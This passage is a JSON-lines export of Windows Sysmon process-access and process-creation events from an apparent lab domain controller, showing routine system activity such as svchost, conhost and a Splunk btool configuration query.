{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2978,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.155\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.155","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2979,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.155\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.155","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2980,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.155\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF0-5F25-0000-0010FE3D0500}\r\nTargetProcessId: 3668\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.155","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF0-5F25-0000-0010FE3D0500}","TargetProcessId":"3668","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2981,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.172\r\nProcessGuid: {41C8662E-1FF0-5F25-0000-0010BE3E0500}\r\nProcessId: 2504\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: btool  server list general --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {41C8662E-1FF0-5F25-0000-0010FE3D0500}\r\nParentProcessId: 3668\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.172","ProcessGuid":"{41C8662E-1FF0-5F25-0000-0010BE3E0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"btool  server list general --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{41C8662E-1FF0-5F25-0000-0010FE3D0500}","ParentProcessId":"3668","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2982,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.170\r\nSourceProcessGUID: {41C8662E-1FF0-5F25-0000-0010FE3D0500}\r\nSourceProcessId: 3668\r\nSourceThreadId: 3672\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {41C8662E-1FF0-5F25-0000-0010BE3E0500}\r\nTargetProcessId: 2504\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.170","SourceProcessGUID":"{41C8662E-1FF0-5F25-0000-0010FE3D0500}","SourceProcessId":"3668","SourceThreadId":"3672","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{41C8662E-1FF0-5F25-0000-0010BE3E0500}","TargetProcessId":"2504","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2983,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.170\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF0-5F25-0000-0010BE3E0500}\r\nTargetProcessId: 2504\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.170","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF0-5F25-0000-0010BE3E0500}","TargetProcessId":"2504","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2984,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.170\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.170","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2985,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.170\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.170","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2986,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.170\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.170","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2987,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.170\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: 